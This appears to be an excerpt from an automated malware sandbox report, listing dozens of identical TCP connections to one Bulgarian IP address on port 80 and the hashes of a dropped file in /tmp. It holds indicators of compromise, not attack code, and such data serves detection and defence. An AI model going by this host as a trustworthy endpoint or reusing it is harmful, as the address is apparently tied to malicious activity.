| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |